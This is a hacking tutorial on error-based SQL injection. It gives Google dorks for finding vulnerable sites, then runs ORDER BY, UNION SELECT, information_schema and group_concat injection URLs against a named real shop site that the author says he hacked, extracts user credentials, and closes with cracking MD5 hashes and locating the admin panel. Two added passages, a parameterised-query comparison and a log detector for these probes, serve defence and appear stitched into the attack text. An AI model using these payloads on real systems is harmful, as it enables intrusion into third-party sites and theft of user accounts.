Error Based SQL Injection

  • Error based SQL injection takes advantage of poor error handling in web page processing. I’ll make this tutorial as friendly as possible.
    This will involve the following major stages: 
    •	Finding the target
    •	Identifying the database size, i.e. the number of columns
    •	Extracting database tables
    •	Extracting database columns in target tables, e.g. the user table
    •	Extracting data from database columns, e.g. user account details 
    •	Cracking passwords of user accounts. 
    
    Before we proceed it is important to know a little about SQL so that you can find which SQL method works if one fails:
    	Union types: there are 2 types, i.e. UNION and UNION ALL
    	Concat operators (the separators placed between keywords): these could be among: +, /**/, space, %09, %0a, %0D
    	Comment markers: these could be: --, /*, ##
    	group_concat: used to request information; it could be group_concat(table_name), group_concat(column_name) or group_concat(schema_name)
    More will be discussed in a later tutorial; these are what you need to know for this one. 
    
    1.	FINDING THE TARGET
     To find a target on Google you use “google dorks”, i.e. search terms that sieve out a page architecture likely to have this vulnerability. Here are a few:
    	allinurl:index.php?id=
    	allinurl:trainers.php?id=
    	allinurl:buy.php?category=
    	allinurl:article.php?ID=
    	allinurl:play_old.php?id=
    	allinurl:newsitem.php?num=
    	allinurl:readnews.php?id=
    	allinurl:top10.php?cat=
    	allinurl:historialeer.php?num=
    	allinurl:reagir.php?num=
    	allinurl:Stray-Questions-View.php?num=
    	allinurl:forum_bds.php?num=
    	allinurl:game.php?id=
    	allinurl:view_product.php?id=
    	allinurl:newsone.php?id=
    	allinurl:sw_comment.php?id=
    	allinurl:news.php?id=
    	allinurl:avd_start.php?avd=
    	allinurl:event.php?id=
    	allinurl:product-item.php?id=
    	allinurl:sql.php?id=
    	allinurl:news_view.php?id=
    	allinurl:select_biblio.php?id=
    	allinurl:humor.php?id=
    	allinurl:aboutbook.php?id=
    	allinurl:ogl_inet.php?ogl_id=
    	allinurl:fiche_spectacle.php?id=
    	allinurl:communique_detail.php?id=
    	allinurl:sem.php3?id=
    	allinurl:kategorie.php4?id=
    	allinurl:faq2.php?id=
    	allinurl:show_an.php?id=
    	allinurl:preview.php?id=
    	allinurl:loadpsb.php?id=
    	allinurl:opinions.php?id=
    	allinurl:spr.php?id=
    	allinurl:pages.php?id=
    	allinurl:announce.php?id=
    	allinurl:clanek.php4?id=
    	allinurl:participant.php?id=
    	allinurl:download.php?id=
    	allinurl:main.php?id=
    	allinurl:review.php?id=
    	allinurl:chappies.php?id=
    	allinurl:read.php?id=
    	allinurl:prod_detail.php?id=
    	allinurl:viewphoto.php?id=
    	allinurl:article.php?id=
    	allinurl:person.php?id=
    	allinurl:productinfo.php?id=
    	allinurl:showimg.php?id=
    	allinurl:view.php?id=
    	allinurl:website.php?id=
    	allinurl:hosting_info.php?id=
    	allinurl:gallery.php?id=
    	allinurl:rub.php?idr=
    	allinurl:view_faq.php?id=
    	allinurl:artikelinfo.php?id=
    	allinurl:detail.php?ID=
    	allinurl:index.php?=
    Just to clarify the dork used:
    inurl: -> is a search parameter in Google so that it searches for the term in the site's URL.
    .php?5= -> is what I'm searching for in a URL. SQL injection works by adding code after the = symbol. This is also commonly referred to as a dork.
    Now from the results just open the links in a new tab and add an apostrophe (') after the URL. A vulnerable target will respond with something like: 
    “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “LIMIT 1 ‘ at line 1”
    Note:
    You could also test for the error by adding ' after the URL (without the quotes), or a " etc.
    Now that we have the victim we need to move on to stage 2:
    2.	IDENTIFYING THE DATABASE
    For this stage we will use a few SQL commands. I will use a live target which I found and hacked for this tutorial. 
    The target is: http://www.styleconnection.co.ke/browse-items.php?id=23
    I want to identify the number of columns as the first thing. To do this we will use the ORDER BY clause, increasing the number until we get an error; the last value that does not error is the number of columns.
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 1--(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 2--(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 3--(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 4--(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 5--(error)
    
    Error reads:
    Unknown column '5' in 'order clause'
    The query therefore returns four columns.
    For more fun we now also need to find columns whose values are displayed on the page, i.e. the ones we can extract data through; they are called string columns. To do this we use a negative sign on the id value and a UNION SELECT statement to find them. 
    So now we will have the URL structured as below.
    The negative sign goes in front of the id value so that the original query matches no row and the page displays the values from our UNION SELECT instead: 
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,3,4--
    Notice the - before 23; it is crucial. 
    
    In my case I got the number “3” on the page. This means that column 3 is displayed and can be used to give us the information we desire. As a test let's get the MySQL database version. To do this we will replace the number 3 with @@version and have this: 
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,@@version,4--
    And voila, the MySQL version is displayed. 
    Now we move to stage 3 where the real injection starts. Just to understand it I would advise you to look at the information_schema database in phpMyAdmin to understand how we structure the rest. If you have WAMP, XAMPP or LAMP on your machine this can be accessed via http://localhost/phpmyadmin.
    The reason we use information_schema is because we don’t know the database name, and information_schema holds information about all the databases on the server, their structure etc.
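    Why binding the id as a parameter stops the probes in this stage. This is an added example, not the target site's code: it builds a constructed four-column table in an in-memory SQLite database (assumed schema) and compares the string-concatenated lookup this page relies on with a parameterised one, using the same "order by 5" and "-23 union select 1,2,3,4" inputs.

```python
import sqlite3

# Constructed stand-in for the shop's product table: four columns, matching the
# count found with ORDER BY above. Assumed schema, not the real application's.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT, descr TEXT, price REAL)")
    db.execute("INSERT INTO items VALUES (23, 'jacket', 'wool', 40.0)")
    return db

def lookup_concat(db, raw_id):
    """The pattern the tutorial exploits: the id is pasted into the SQL text,
    so 'order by 5' and 'union select' are parsed as SQL, not as a value."""
    sql = f"SELECT id, name, descr, price FROM items WHERE id={raw_id}"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # This is the error message the vulnerable page leaks back to the visitor.
        return f"error: {exc}"

def lookup_param(db, raw_id):
    """Hardened form: reject anything that is not a plain integer, then bind
    the value as a parameter so the driver never parses it as SQL."""
    try:
        item_id = int(raw_id)
    except ValueError:
        return []
    return db.execute(
        "SELECT id, name, descr, price FROM items WHERE id=?", (item_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ("23", "23 order by 5--", "-23 union select 1,2,3,4--"):
        print(f"{probe!r:32} concat -> {lookup_concat(db, probe)}")
        print(f"{'':32} param  -> {lookup_param(db, probe)}")
```

    With concatenation the fifth ORDER BY term raises a database error and the negative id makes the UNION row the only output, exactly the two signals the tutorial reads; with the parameterised lookup both probes simply return no row.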
    3.	EXTRACTING DATABASE TABLES
    Extracting the database tables involves group_concat statements. We want the table names, therefore we will use group_concat(table_name) to pull them from information_schema. We will have a URL like this: 
    
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
    
    Notice that group_concat(table_name) is in the place of the number 3, as that is the column whose output is shown on the page. What follows after the 4 is the FROM and WHERE clause: it reads from information_schema.tables and keeps only the tables belonging to the current database (database()). 
    
    From my attack the webpage listed all the tables as below: 
    “tbl_cart,tbl_cartitems,tbl_cartstatus,tbl_categories,tbl_clientdetails,tbl_countries,tbl_deliverymethods,tbl_feedbacks,tbl_inventory,tbl_orders,tbl_orderstatus,tbl_paymentmethods,tbl_payments,tbl_paymentstatus,tbl_permits,tbl_products,tbl_productstatus,tbl_statistics,tbl_sysusers,tbl_tagitems,tbl_tags,tbl_usergroups,tbl_users,tbl_userstatus”
    
    4.	EXTRACTING DATABASE COLUMNS
    If you are feeling geeky, don’t; it gets better. Now you can extract columns from all the databases, but I prefer an easier way: get full rights first, then go for the kill, so I will only deal with the users table so that I can become admin and have full control. The table to attack is tbl_users. Just as a precaution I prefer to hide the table name when requesting the column names, by writing it as a hexadecimal literal. To create hexadecimal equivalents I use hexjector or http://home2.paulschou.net/tools/xlate/, but you can use other services too if you like. 
    The value of tbl_users in hexadecimal is 74626c5f7573657273, but we need to add the prefix 0x before it (hexjector does this automatically) so that MySQL reads it as a hex literal rather than a plain string; therefore we will have 0x74626c5f7573657273 as the table name. To extract the column names via injection we use group_concat(column_name), and instead of reading from information_schema.tables where the schema is the current database, we read from information_schema.columns where the table name is our table, in this case tbl_users. So the URL is going to be: 
    
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x74626c5f7573657273—
    and woohoo we know the columns in that table by name: 
    
    result in my case:
    
    “UserId,Username,Password,GroupId,ActivationCode,StatusId”
    
    5.	EXTRACTING DATA FROM DATABASE COLUMNS
    Stop salivating, you are not home yet. We are almost there though; now we just want the accounts, since we know the fields in the table. We don’t need all the columns, just the username and password. When extracting specific data we use 0x3a (the hex literal for a colon, used as a separator) and group_concat(field1,0x3a,field2) as the method.
    Here goes nothing :D ….. 
    
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,group_concat(Username,0x3a,Password),4+from+tbl_users—
    and voila guess what : 
    
    
    But I only need admin so now to get the password in plain English. 
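    Detection logic for the stages above, added here and not part of the original tutorial: it scans constructed Apache-style access-log lines for the ORDER BY counting, UNION SELECT, information_schema, hex-literal and group_concat patterns used in stages 2 to 5, after undoing the separator tricks listed at the top (+, %20, /**/), and reports which client tripped several of them. The log lines and addresses are sample data, not a real server's log.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines mirroring the probes used above.
# The first client walks stages 1-5 (using the %20, + and /**/ separators); the
# second is an ordinary visitor. Sample data, not a real server's log.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:01:01 +0000] "GET /browse-items.php?id=23 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:01:05 +0000] "GET /browse-items.php?id=23%27 HTTP/1.1" 500 310
203.0.113.7 - - [10/Oct/2023:10:01:09 +0000] "GET /browse-items.php?id=23%20order%20by%205-- HTTP/1.1" 500 310
203.0.113.7 - - [10/Oct/2023:10:01:20 +0000] "GET /browse-items.php?id=-23+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5300
203.0.113.7 - - [10/Oct/2023:10:01:31 +0000] "GET /browse-items.php?id=-23/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name=0x74626c5f7573657273-- HTTP/1.1" 200 5300
198.51.100.9 - - [10/Oct/2023:10:02:00 +0000] "GET /browse-items.php?id=24 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One rule per stage of the tutorial, applied to the decoded, normalised query string.
RULES = [
    ("syntax_probe", re.compile(r"['\"]$")),                                   # stage 1: trailing quote
    ("column_count", re.compile(r"\border by \d+")),                            # stage 2: ORDER BY n
    ("union_select", re.compile(r"\bunion (all )?select\b")),                   # stage 2: UNION SELECT
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),   # stages 3-4
    ("hex_literal", re.compile(r"=0x[0-9a-f]{4,}")),                            # stage 4: hex table name
    ("group_concat", re.compile(r"\bgroup_concat\(")),                          # stages 3-5
]

def normalise(query):
    """Decode %xx and '+', strip /**/ comments and collapse whitespace, so every separator variant looks the same."""
    decoded = unquote_plus(query)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def classify(line):
    """(client ip, rule names tripped) for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalise(m["path"].partition("?")[2])
    return m["ip"], [name for name, rx in RULES if rx.search(query)]

def scan(log_text, threshold=3):
    """Clients that tripped at least `threshold` distinct rules, with the sorted rule names.
    One stray UNION may be noise; a client climbing the whole ladder is not."""
    per_ip = {}
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec[1]:
            per_ip.setdefault(rec[0], set()).update(rec[1])
    return {ip: sorted(hits) for ip, hits in per_ip.items() if len(hits) >= threshold}
```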
    6.	CRACKING PASSWORDS
    The hash returned is a plain MD5 hash (what PHP's md5() produces), so let’s crack it using an online service; it is faster than the offline method, however if you want to you could crack them offline. If so you can use: 
    •	Hashcat GUI
    •	John the Ripper
    But I use an online service: http://www.md5decrypter.co.uk/
    Paste the hash, verify you are not a bot and click “decrypt hashes”. And there you have it. Now find the admin area, usually any of the following:
    /cp
    /admin
    /cms
    /administrator
    /admin.php
    /owner